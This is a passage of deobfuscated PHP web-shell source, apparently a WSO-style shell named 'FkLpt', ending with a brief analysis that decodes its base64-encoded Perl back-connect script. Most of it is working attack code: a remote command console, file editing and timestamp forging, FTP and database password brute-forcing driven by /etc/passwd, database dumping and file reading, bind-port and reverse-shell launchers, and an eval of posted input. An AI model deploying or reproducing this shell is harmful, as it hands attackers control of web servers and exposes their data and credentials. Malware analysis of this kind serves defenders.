echo str_replace(array('<span ', '</span>'), array('<font ', '</font>'), $code) . '</div>';
}
goto F5018;
case 'chmod':
if (!empty($_POST['p3'])) {
$perms = 0;
$i = strlen($_POST['p3']) - 1;
D86ac:
if (!($i >= 0)) {
if (!@chmod($_POST['p1'], $perms)) {
echo "Can't set permissions!<br><script>document.mf.p3.value=\"\";</script>";
}
}
$perms += (int) $_POST['p3'][$i] * pow(8, strlen($_POST['p3']) - $i - 1);
--$i;
goto D86ac;
}
clearstatcache();
echo '<script>p3_="";</script><form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,this.chmod.value);return false;"><input type=text name=chmod value="' . substr(sprintf('%o', fileperms($_POST['p1'])), -4) . '"><input type=submit value=">>"></form>';
goto F5018;
case 'edit':
if (!is_writable($_POST['p1'])) {
echo "File isn't writeable";
goto F5018;
}
if (!empty($_POST['p3'])) {
$time = @filemtime($_POST['p1']);
$_POST['p3'] = substr($_POST['p3'], 1);
$fp = @fopen($_POST['p1'], "w");
if ($fp) {
@fwrite($fp, $_POST['p3']);
@fclose($fp);
echo "Saved!<br><script>p3_=\"\";</script>";
@touch($_POST['p1'], $time, $time);
}
}
echo '<form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,\'1\'+this.text.value);return false;"><textarea name=text class=bigarea>';
$fp = @fopen($_POST['p1'], 'r');
if ($fp) {
f52cc:
if (@feof($fp)) {
@fclose($fp);
}
echo htmlspecialchars(@fread($fp, 1024));
goto f52cc;
}
echo "</textarea><input type=submit value=\">>\"></form>";
goto F5018;
case 'hexdump':
$c = @file_get_contents($_POST['p1']);
$n = 0;
$h = array('00000000<br>', '', '');
$len = strlen($c);
$i = 0;
faf20:
if (!($i < $len)) {
echo "<table cellspacing=1 cellpadding=5 bgcolor=#222222><tr><td bgcolor=#333333><span style=\"font-weight: normal;\"><pre>00000000<br></pre></span></td><td bgcolor=#282828><pre></pre></td><td bgcolor=#333333><pre>" . htmlspecialchars($h[2]) . '</pre></td></tr></table>';
goto F5018;
}
$h[1] .= sprintf('%02X', ord($c[$i])) . ' ';
switch (ord($c[$i])) {
case 0:
$h[2] .= ' ';
goto C68e4;
case 9:
$h[2] .= ' ';
goto C68e4;
case 10:
$h[2] .= ' ';
goto C68e4;
case 13:
$h[2] .= ' ';
goto C68e4;
default:
$h[2] .= $c[$i];
goto C68e4;
}
C68e4:
$n++;
if ($n == 32) {
$n = 0;
if ($i + 1 < $len) {
$h[0] .= sprintf('%08X', $i + 1) . '<br>';
}
$h[1] .= '<br>';
$h[2] .= "\n";
}
++$i;
goto faf20;
case 'rename':
if (!empty($_POST['p3'])) {
if (!@rename($_POST['p1'], $_POST['p3'])) {
echo "Can't rename!<br>";
} else {
die('<script>g(null,null,"' . urlencode($_POST['p3']) . '",null,"")</script>');
}
}
echo '<form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,this.name.value);return false;"><input type=text name=name value="' . htmlspecialchars($_POST['p1']) . '"><input type=submit value=">>"></form>';
goto F5018;
case 'touch':
if (!empty($_POST['p3'])) {
$time = strtotime($_POST['p3']);
if ($time) {
if (!touch($_POST['p1'], $time, $time)) {
echo "Fail!";
} else {
echo "Touched!";
}
} else {
echo "Bad time format!";
}
}
clearstatcache();
echo '<script>p3_="";</script><form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,this.touch.value);return false;"><input type=text name=touch value="' . date("Y-m-d H:i:s", @filemtime($_POST['p1'])) . '"><input type=submit value=">>"></form>';
goto F5018;
}
F5018:
echo "</div>";
FkLptFooter();
}
function actionConsole()
{
if (!empty($_POST['p1']) && !empty($_POST['p2'])) {
FkLptsetcookie(md5($_SERVER['HTTP_HOST']) . 'stderr_to_out', true);
$_POST['p1'] .= ' 2>&1';
} elseif (!empty($_POST['p1'])) {
FkLptsetcookie(md5($_SERVER['HTTP_HOST']) . 'stderr_to_out', 0);
}
if (isset($_POST['ajax'])) {
FkLptsetcookie(md5($_SERVER['HTTP_HOST']) . 'ajax', true);
ob_start();
echo "d.cf.cmd.value='';\n";
$temp = @iconv($_POST['charset'], 'UTF-8', addcslashes("\n\$ " . $_POST['p1'] . "\n" . FkLptEx($_POST['p1']), "\n\r\t\\'\0"));
if (preg_match("!.*cd\\s+([^;]+)\$!", $_POST['p1'], $match)) {
if (@chdir($match[1])) {
$GLOBALS['cwd'] = @getcwd();
echo "c_='" . $GLOBALS['cwd'] . "';";
}
}
echo "d.cf.output.value+='" . $temp . "';";
echo "d.cf.output.scrollTop = d.cf.output.scrollHeight;";
$temp = ob_get_clean();
echo strlen($temp), "\n", $temp;
exit;
}
if (empty($_POST['ajax']) && !empty($_POST['p1'])) {
FkLptsetcookie(md5($_SERVER['HTTP_HOST']) . 'ajax', 0);
}
FkLptHeader();
echo "<script>\r\nif(window.Event) window.captureEvents(Event.KEYDOWN);\r\nvar cmds = new Array('');\r\nvar cur = 0;\r\nfunction kp(e) {\r\n\tvar n = (window.Event) ? e.which : e.keyCode;\r\n\tif(n == 38) {\r\n\t\tcur--;\r\n\t\tif(cur>=0)\r\n\t\t\tdocument.cf.cmd.value = cmds[cur];\r\n\t\telse\r\n\t\t\tcur++;\r\n\t} else if(n == 40) {\r\n\t\tcur++;\r\n\t\tif(cur < cmds.length)\r\n\t\t\tdocument.cf.cmd.value = cmds[cur];\r\n\t\telse\r\n\t\t\tcur--;\r\n\t}\r\n}\r\nfunction add(cmd) {\r\n\tcmds.pop();\r\n\tcmds.push(cmd);\r\n\tcmds.push('');\r\n\tcur = cmds.length-1;\r\n}\r\n</script>";
echo "<h1>Console</h1><div class=content><form name=cf onsubmit=\"if(d.cf.cmd.value=='clear'){d.cf.output.value='';d.cf.cmd.value='';return false;}add(this.cmd.value);if(this.ajax.checked){a(null,null,this.cmd.value,this.show_errors.checked?1:'');}else{g(null,null,this.cmd.value,this.show_errors.checked?1:'');} return false;\"><select name=alias>";
foreach ($GLOBALS['aliases'] as $n => $v) {
if ($v == '') {
echo '<optgroup label="-' . htmlspecialchars($n) . '-"></optgroup>';
goto A8280;
}
echo '<option value="' . htmlspecialchars($v) . '">' . $n . '</option>';
A8280:
}
echo '</select><input type=button onclick="add(d.cf.alias.value);if(d.cf.ajax.checked){a(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:\'\');}else{g(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:\'\');}" value=">>"> <nobr><input type=checkbox name=ajax value=1 ' . (@$_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'] ? 'checked' : '') . '> send using AJAX <input type=checkbox name=show_errors value=1 ' . (!empty($_POST['p2']) || $_COOKIE[md5($_SERVER['HTTP_HOST']) . 'stderr_to_out'] ? 'checked' : '') . '> redirect stderr to stdout (2>&1)</nobr><br/><textarea class=bigarea name=output style="border-bottom:0;margin:0;" readonly>';
if (!empty($_POST['p1'])) {
echo htmlspecialchars("\$ " . $_POST['p1'] . "\n" . FkLptEx($_POST['p1']));
}
echo "</textarea><table style=\"border:1px solid #df5;background-color:#555;border-top:0px;\" cellpadding=0 cellspacing=0 width=\"100%\"><tr><td width=\"1%\">\$</td><td><input type=text name=cmd style=\"border:0px;width:100%;\" onkeydown=\"kp(event);\"></td></tr></table>";
echo "</form></div><script>d.cf.cmd.focus();</script>";
FkLptFooter();
}
function actionLogout()
{
setcookie(md5($_SERVER['HTTP_HOST']), '', time() - 3600);
die('bye!');
}
function actionSelfRemove()
{
if ($_POST['p1'] == 'yes') {
if (@unlink("/var/www/html/shell-deobf-4.php.txt")) {
die('Shell has been removed');
} else {
echo "unlink error!";
}
}
if ($_POST['p1'] != 'yes') {
FkLptHeader();
}
echo "<h1>Suicide</h1><div class=content>Really want to remove the shell?<br><a href=# onclick=\"g(null,null,'yes')\">Yes</a></div>";
FkLptFooter();
}
function actionBruteforce()
{
FkLptHeader();
if (isset($_POST['proto'])) {
echo '<h1>Results</h1><div class=content><span>Type:</span> ' . htmlspecialchars($_POST['proto']) . ' <span>Server:</span> ' . htmlspecialchars($_POST['server']) . '<br>';
if ($_POST['proto'] == 'ftp') {
function FkLptBruteForce($ip, $port, $login, $pass)
{
$fp = @ftp_connect($ip, $port ? $port : 21);
if (!$fp) {
return false;
}
$res = @ftp_login($fp, $login, $pass);
@ftp_close($fp);
return $res;
}
} elseif ($_POST['proto'] == 'mysql') {
function FkLptBruteForce($ip, $port, $login, $pass)
{
$res = @mysql_connect($ip . ':' . ($port ? $port : 3306), $login, $pass);
@mysql_close($res);
return $res;
}
} elseif ($_POST['proto'] == 'pgsql') {
function FkLptBruteForce($ip, $port, $login, $pass)
{
$str = "host='" . $ip . "' port='" . $port . "' user='" . $login . "' password='" . $pass . "' dbname=postgres";
$res = @pg_connect($str);
@pg_close($res);
return $res;
}
}
$success = 0;
$attempts = 0;
$server = explode(":", $_POST['server']);
if ($_POST['type'] == 1) {
$temp = @file('/etc/passwd');
if (is_array($temp)) {
foreach ($temp as $line) {
$line = explode(":", $line);
++$attempts;
if (FkLptBruteForce(@$server[0], @$server[1], $line[0], $line[0])) {
$success++;
echo '<b>' . htmlspecialchars($line[0]) . '</b>:' . htmlspecialchars($line[0]) . '<br>';
}
if (@$_POST['reverse']) {
$tmp = "";
$i = strlen($line[0]) - 1;
e0fc2:
if (!($i >= 0)) {
++$attempts;
if (FkLptBruteForce(@$server[0], @$server[1], $line[0], $tmp)) {
$success++;
echo '<b>' . htmlspecialchars($line[0]) . '</b>:' . htmlspecialchars($tmp);
}
}
$tmp .= $line[0][$i];
--$i;
goto e0fc2;
}
}
}
} elseif ($_POST['type'] == 2) {
$temp = @file($_POST['dict']);
if (is_array($temp)) {
foreach ($temp as $line) {
$line = trim($line);
++$attempts;
if (FkLptBruteForce($server[0], @$server[1], $_POST['login'], $line)) {
$success++;
echo '<b>' . htmlspecialchars($_POST['login']) . '</b>:' . htmlspecialchars($line) . '<br>';
}
}
}
}
echo "<span>Attempts:</span> {$attempts} <span>Success:</span> {$success}</div><br>";
}
echo '<h1>Bruteforce</h1><div class=content><table><form method=post><tr><td><span>Type</span></td><td><select name=proto><option value=ftp>FTP</option><option value=mysql>MySql</option><option value=pgsql>PostgreSql</option></select></td></tr><tr><td><input type=hidden name=c value="' . htmlspecialchars($GLOBALS['cwd']) . '">' . '<input type=hidden name=a value="' . htmlspecialchars($_POST['a']) . '">' . '<input type=hidden name=charset value="' . htmlspecialchars($_POST['charset']) . '">' . '<span>Server:port</span></td>' . '<td><input type=text name=server value="127.0.0.1"></td></tr>' . '<tr><td><span>Brute type</span></td>' . '<td><label><input type=radio name=type value="1" checked> /etc/passwd</label></td></tr>' . '<tr><td></td><td><label style="padding-left:15px"><input type=checkbox name=reverse value=1 checked> reverse (login -> nigol)</label></td></tr>' . '<tr><td></td><td><label><input type=radio name=type value="2"> Dictionary</label></td></tr>' . '<tr><td></td><td><table style="padding-left:15px"><tr><td><span>Login</span></td>' . '<td><input type=text name=login value="root"></td></tr>' . '<tr><td><span>Dictionary</span></td>' . '<td><input type=text name=dict value="' . htmlspecialchars($GLOBALS['cwd']) . 'passwd.dic"></td></tr></table>' . '</td></tr><tr><td></td><td><input type=submit value=">>"></td></tr></form></table>';
echo "</div><br>";
FkLptFooter();
}
function actionSql()
{
class DbClass
{
var $type;
var $link;
var $res;
function __construct($type)
{
$this->type = $type;
}
function connect($host, $user, $pass, $dbname)
{
switch ($this->type) {
case 'mysql':
if ($this->link = @mysql_connect($host, $user, $pass, true)) {
return true;
}
goto De113;
case 'pgsql':
$host = explode(':', $host);
if (!$host[1]) {
$host[1] = 5432;
}
if ($this->link = @pg_connect("host={$host[0]} port={$host[1]} user={$user} password={$pass} dbname={$dbname}")) {
return true;
}
goto De113;
}
De113:
return false;
}
function selectdb($db)
{
switch ($this->type) {
case 'mysql':
if (@mysql_select_db($db)) {
return true;
}
goto a1cee;
}
a1cee:
return false;
}
function query($str)
{
switch ($this->type) {
case 'mysql':
return $this->res = @mysql_query($str);
case 'pgsql':
return $this->res = @pg_query($this->link, $str);
}
return false;
}
function fetch()
{
$res = func_num_args() ? func_get_arg(0) : $this->res;
switch ($this->type) {
case 'mysql':
return @mysql_fetch_assoc($res);
case 'pgsql':
return @pg_fetch_assoc($res);
}
return false;
}
function listDbs()
{
switch ($this->type) {
case 'mysql':
return $this->query("SHOW databases");
case 'pgsql':
return $this->res = $this->query("SELECT datname FROM pg_database WHERE datistemplate!='t'");
}
return false;
}
function listTables()
{
switch ($this->type) {
case 'mysql':
return $this->res = $this->query('SHOW TABLES');
case 'pgsql':
return $this->res = $this->query("select table_name from information_schema.tables where table_schema != 'information_schema' AND table_schema != 'pg_catalog'");
}
return false;
}
function error()
{
switch ($this->type) {
case 'mysql':
return @mysql_error();
case 'pgsql':
return @pg_last_error();
}
return false;
}
function setCharset($str)
{
switch ($this->type) {
case 'mysql':
if (function_exists('mysql_set_charset')) {
return @mysql_set_charset($str, $this->link);
} else {
$this->query('SET CHARSET ' . $str);
}
goto C4b60;
case 'pgsql':
return @pg_set_client_encoding($this->link, $str);
}
C4b60:
return false;
}
function loadFile($str)
{
switch ($this->type) {
case 'mysql':
return $this->fetch($this->query("SELECT LOAD_FILE('" . addslashes($str) . "') as file"));
case 'pgsql':
$this->query("CREATE TABLE FkLpt2(file text);COPY FkLpt2 FROM '" . addslashes($str) . "';select file from FkLpt2;");
$r = array();
Dc34f:
if (!($i = $this->fetch())) {
$this->query('drop table FkLpt2');
return array('file' => "");
}
$r[] = $i['file'];
goto Dc34f;
}
b0987:
return false;
}
function dump($table, $fp = false)
{
switch ($this->type) {
case 'mysql':
$res = $this->query('SHOW CREATE TABLE `' . $table . '`');
$create = mysql_fetch_array($res);
$sql = $create[1] . ";\n";
if ($fp) {
fwrite($fp, $sql);
} else {
echo $sql;
}
$this->query('SELECT * FROM `' . $table . '`');
$i = 0;
$head = true;
D9b6e:
if (!($item = $this->fetch())) {
if (!$head) {
if ($fp) {
fwrite($fp, ";\n\n");
} else {
echo ";\n\n";
}
}
goto c22a2;
}
$sql = '';
if ($i % 1000 == 0) {
$head = true;
$sql = ";\n\n";
}
$columns = array();
foreach ($item as $k => $v) {
if ($v === null) {
$item[$k] = "NULL";
} elseif (is_int($v)) {
$item[$k] = $v;
} else {
$item[$k] = "'" . @mysql_real_escape_string($v) . "'";
}
$columns[] = "`" . $k . "`";
}
if ($head) {
$sql .= 'INSERT INTO `' . $table . '` (' . implode(", ", $columns) . ") VALUES \n\t(" . implode(", ", $item) . ')';
$head = false;
} else {
$sql .= "\n\t,(" . implode(", ", $item) . ')';
}
if ($fp) {
fwrite($fp, $sql);
} else {
echo $sql;
}
$i++;
goto D9b6e;
case 'pgsql':
$this->query('SELECT * FROM ' . $table);
b6ee7:
if (!($item = $this->fetch())) {
goto c22a2;
}
$columns = array();
foreach ($item as $k => $v) {
$item[$k] = "'" . addslashes($v) . "'";
$columns[] = $k;
}
$sql = 'INSERT INTO ' . $table . ' (' . implode(", ", $columns) . ') VALUES (' . implode(", ", $item) . ');' . "\n";
if ($fp) {
fwrite($fp, $sql);
} else {
echo $sql;
}
goto b6ee7;
}
c22a2:
return false;
}
}
$db = new DbClass($_POST['type']);
if (@$_POST['p2'] == 'download' && @$_POST['p1'] != 'select') {
$db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base']);
$db->selectdb($_POST['sql_base']);
switch ($_POST['charset']) {
case "Windows-1251":
$db->setCharset('cp1251');
goto A973e;
case "UTF-8":
$db->setCharset('utf8');
goto A973e;
case "KOI8-R":
$db->setCharset('koi8r');
goto A973e;
case "KOI8-U":
$db->setCharset('koi8u');
goto A973e;
case "cp866":
$db->setCharset('cp866');
goto A973e;
}
A973e:
if (empty($_POST['file'])) {
ob_start("ob_gzhandler", 4096);
header("Content-Disposition: attachment; \r\nfilename=dump.sql");
header("Content-Type: text/plain");
foreach ($_POST['tbl'] as $v) {
$db->dump($v);
}
exit;
} elseif ($fp = @fopen($_POST['file'], 'w')) {
foreach ($_POST['tbl'] as $v) {
$db->dump($v, $fp);
}
fclose($fp);
unset($_POST['p2']);
} else {
die('<script>alert("Error! Can\'t open file");window.history.back(-1)</script>');
}
}
FkLptHeader();
echo "\r\n<h1>Sql browser</h1><div class=content>\r\n<form name='sf' method='post' onsubmit='fs(this);'><table cellpadding='2' cellspacing='0'><tr>\r\n<td>Type</td><td>Host</td><td>Login</td><td>Password</td><td>Database</td><td></td></tr><tr>\r\n<input type=hidden name=a value=Sql><input type=hidden name=p1 value='query'><input type=hidden name=p2 value=''><input type=hidden name=c value='" . htmlspecialchars($GLOBALS['cwd']) . "'><input type=hidden name=charset value='" . (isset($_POST['charset']) ? $_POST['charset'] : '') . "'>\r\n<td><select name='type'><option value='mysql' ";
if (@$_POST['type'] == 'mysql') {
echo "selected";
}
echo ">MySql</option><option value='pgsql' ";
if (@$_POST['type'] == 'pgsql') {
echo "selected";
}
echo ">PostgreSql</option></select></td>\r\n<td><input type=text name=sql_host value=\"" . (empty($_POST['sql_host']) ? 'localhost' : htmlspecialchars($_POST['sql_host'])) . "\"></td>\r\n<td><input type=text name=sql_login value=\"" . (empty($_POST['sql_login']) ? 'root' : htmlspecialchars($_POST['sql_login'])) . "\"></td>\r\n<td><input type=text name=sql_pass value=\"" . (empty($_POST['sql_pass']) ? '' : htmlspecialchars($_POST['sql_pass'])) . "\"></td><td>";
$tmp = "<input type=text name=sql_base value=''>";
if (isset($_POST['sql_host'])) {
if ($db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base'])) {
switch ($_POST['charset']) {
case "Windows-1251":
$db->setCharset('cp1251');
goto C590c;
case "UTF-8":
$db->setCharset('utf8');
goto C590c;
case "KOI8-R":
$db->setCharset('koi8r');
goto C590c;
case "KOI8-U":
$db->setCharset('koi8u');
goto C590c;
case "cp866":
$db->setCharset('cp866');
goto C590c;
}
C590c:
$db->listDbs();
echo "<select name=sql_base><option value=''></option>";
E75ab:
if (!($item = $db->fetch())) {
echo "</select>";
}
list($key, $value) = each($item);
echo '<option value="' . $value . '" ' . ($value == $_POST['sql_base'] ? 'selected' : '') . '>' . $value . '</option>';
goto E75ab;
} else {
echo $tmp;
}
} else {
echo $tmp;
}
echo "</td>\r\n\t\t\t\t<td><input type=submit value='>>' onclick='fs(d.sf);'></td>\r\n <td><input type=checkbox name=sql_count value='on'" . (empty($_POST['sql_count']) ? '' : ' checked') . "> count the number of rows</td>\r\n\t\t\t</tr>\r\n\t\t</table>\r\n\t\t<script>\r\n s_db='" . @addslashes($_POST['sql_base']) . "';\r\n function fs(f) {\r\n if(f.sql_base.value!=s_db) { f.onsubmit = function() {};\r\n if(f.p1) f.p1.value='';\r\n if(f.p2) f.p2.value='';\r\n if(f.p3) f.p3.value='';\r\n }\r\n }\r\n\t\t\tfunction st(t,l) {\r\n\t\t\t\td.sf.p1.value = 'select';\r\n\t\t\t\td.sf.p2.value = t;\r\n if(l && d.sf.p3) d.sf.p3.value = l;\r\n\t\t\t\td.sf.submit();\r\n\t\t\t}\r\n\t\t\tfunction is() {\r\n\t\t\t\tfor(i=0;i<d.sf.elements['tbl[]'].length;++i)\r\n\t\t\t\t\td.sf.elements['tbl[]'][i].checked = !d.sf.elements['tbl[]'][i].checked;\r\n\t\t\t}\r\n\t\t</script>";
if (isset($db) && $db->link) {
echo "<br/><table width=100% cellpadding=2 cellspacing=0>";
if (!empty($_POST['sql_base'])) {
$db->selectdb($_POST['sql_base']);
echo "<tr><td width=1 style='border-top:2px solid #666;'><span>Tables:</span><br><br>";
$tbls_res = $db->listTables();
Cb5c2:
if (!($item = $db->fetch($tbls_res))) {
echo "<input type='checkbox' onclick='is();'> <input type=button value='Dump' onclick='document.sf.p2.value=\"download\";document.sf.submit();'><br>File path:<input type=text name=file value='dump.sql'></td><td style='border-top:2px solid #666;'>";
if (@$_POST['p1'] == 'select') {
$_POST['p1'] = 'query';
$_POST['p3'] = $_POST['p3'] ? $_POST['p3'] : 1;
$db->query('SELECT COUNT(*) as n FROM ' . $_POST['p2']);
$num = $db->fetch();
$pages = ceil($num['n'] / 30);
echo "<script>d.sf.onsubmit=function(){st(\"" . $_POST['p2'] . "\", d.sf.p3.value)}</script><span>" . $_POST['p2'] . "</span> ({$num['n']} records) Page # <input type=text name='p3' value=" . (int) $_POST['p3'] . ">";
echo " of {$pages}";
if ($_POST['p3'] > 1) {
echo " <a href=# onclick='st(\"" . $_POST['p2'] . '", ' . ($_POST['p3'] - 1) . ")'>< \r\nPrev</a>";
}
if ($_POST['p3'] < $pages) {
echo " <a href=# onclick='st(\"" . $_POST['p2'] . '", ' . ($_POST['p3'] + 1) . ")'>Next ></a>";
}
$_POST['p3']--;
if ($_POST['type'] == 'pgsql') {
$_POST['p2'] = 'SELECT * FROM ' . $_POST['p2'] . ' LIMIT 30 OFFSET ' . $_POST['p3'] * 30;
} else {
$_POST['p2'] = 'SELECT * FROM `' . $_POST['p2'] . '` LIMIT ' . $_POST['p3'] * 30 . ',30';
}
echo "<br><br>";
}
if (@$_POST['p1'] == 'query' && !empty($_POST['p2'])) {
$db->query(@$_POST['p2']);
if ($db->res !== false) {
$title = false;
echo "<table width=100% cellspacing=1 cellpadding=2 class=main style=\"background-color:#292929\">";
$line = 1;
a6970:
if (!($item = $db->fetch())) {
echo "</table>";
}
if (!$title) {
echo "<tr>";
foreach ($item as $key => $value) {
echo '<th>' . $key . '</th>';
}
reset($item);
$title = true;
echo "</tr><tr>";
$line = 2;
}
echo '<tr class="l' . $line . '">';
$line = $line == 1 ? 2 : 1;
foreach ($item as $key => $value) {
if ($value == null) {
echo "<td><i>null</i></td>";
} else {
echo '<td>' . nl2br(htmlspecialchars($value)) . '</td>';
}
}
echo "</tr>";
goto a6970;
} else {
echo '<div><b>Error:</b> ' . htmlspecialchars($db->error()) . '</div>';
}
}
echo "<br></form><form onsubmit='d.sf.p1.value=\"query\";d.sf.p2.value=this.query.value;document.sf.submit();return false;'><textarea name='query' style='width:100%;height:100px'>";
if (!empty($_POST['p2']) && $_POST['p1'] != 'loadfile') {
echo htmlspecialchars($_POST['p2']);
}
echo "</textarea><br/><input type=submit value='Execute'>";
echo "</td></tr>";
}
list($key, $value) = each($item);
if (!empty($_POST['sql_count'])) {
$n = $db->fetch($db->query('SELECT COUNT(*) as n FROM ' . $value . ''));
}
$value = htmlspecialchars($value);
echo "<nobr><input type='checkbox' name='tbl[]' value='" . $value . "'> <a href=# onclick=\"st('" . $value . "',1)\">" . $value . "</a>" . (empty($_POST['sql_count']) ? ' ' : " <small>({$n['n']})</small>") . "</nobr><br>";
goto Cb5c2;
}
echo "</table></form><br/>";
if ($_POST['type'] == 'mysql') {
$db->query("SELECT 1 FROM mysql.user WHERE concat(`user`, '@', `host`) = USER() AND `File_priv` = 'y'");
if ($db->fetch()) {
echo "<form onsubmit='d.sf.p1.value=\"loadfile\";document.sf.p2.value=this.f.value;document.sf.submit();return false;'><span>Load file</span> <input class='toolsInp' type=text name=f><input type=submit value='>>'></form>";
}
}
if (@$_POST['p1'] == 'loadfile') {
$file = $db->loadFile($_POST['p2']);
echo '<br/><pre class=ml1>' . htmlspecialchars($file['file']) . '</pre>';
}
} else {
echo htmlspecialchars($db->error());
}
echo "</div>";
FkLptFooter();
}
function actionNetwork()
{
FkLptHeader();
$back_connect_p = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
$bind_port_p = "IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
echo "<h1>Network tools</h1><div class=content>\r\n\t<form name='nfp' onSubmit=\"g(null,null,'bpp',this.port.value);return false;\">\r\n\t<span>Bind port to /bin/sh [perl]</span><br/>\r\n\tPort: <input type='text' name='port' value='31337'> <input type=submit value='>>'>\r\n\t</form>\r\n\t<form name='nfp' onSubmit=\"g(null,null,'bcp',this.server.value,this.port.value);return false;\">\r\n\t<span>Back-connect [perl]</span><br/>\r\n\tServer: <input type='text' name='server' value='" . $_SERVER['REMOTE_ADDR'] . "'> Port: <input type='text' name='port' value='31337'> <input type=submit value='>>'>\r\n\t</form><br>";
if (isset($_POST['p1'])) {
function cf($f, $t)
{
$w = @fopen($f, "w") or @function_exists('file_put_contents');
if ($w) {
@fwrite($w, @base64_decode($t));
@fclose($w);
}
}
if ($_POST['p1'] == 'bpp') {
cf("/tmp/bp.pl", $bind_port_p);
$out = FkLptEx("perl /tmp/bp.pl " . $_POST['p2'] . " 1>/dev/null 2>&1 &");
sleep(1);
echo "<pre class=ml1>{$out}\n" . FkLptEx("ps aux | grep bp.pl") . "</pre>";
unlink("/tmp/bp.pl");
}
if ($_POST['p1'] == 'bcp') {
cf("/tmp/bc.pl", $back_connect_p);
$out = FkLptEx("perl /tmp/bc.pl " . $_POST['p2'] . " " . $_POST['p3'] . " 1>/dev/null 2>&1 &");
sleep(1);
echo "<pre class=ml1>{$out}\n" . FkLptEx("ps aux | grep bc.pl") . "</pre>";
unlink("/tmp/bc.pl");
}
}
echo "</div>";
FkLptFooter();
}
function actionRC()
{
if (!@$_POST['p1']) {
$a = array("uname" => php_uname(), "php_version" => phpversion(), "FkLpt_version" => FkLpt_VERSION, "safemode" => @ini_get('safe_mode'));
echo serialize($a);
} else {
eval($_POST['p1']);
}
}
if (empty($_POST['a'])) {
if (isset($default_action) && function_exists('action' . $default_action)) {
$_POST['a'] = $default_action;
} else {
$_POST['a'] = 'SecInfo';
}
}
if (!empty($_POST['a']) && function_exists('action' . $_POST['a'])) {
call_user_func('action' . $_POST['a']);
}
exit;
Base64 Variables
There are some base64-encoded variables near the end of the script which, when decoded, are network connections using perl:
$back_connect_p = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
#!/usr/bin/perl
use Socket;
$iaddr=inet_aton($ARGV[0]) || die("Error: $!\n");
$paddr=sockaddr_in($ARGV[1], $iaddr) || die("Error: $!\n");
$proto=getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
connect(SOCKET, $paddr) || die("Error: $!\n");
open(STDIN, ">&SOCKET");
open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET");
system('/bin/sh -i');
close(STDIN);
close(STDOUT);
close(STDERR);
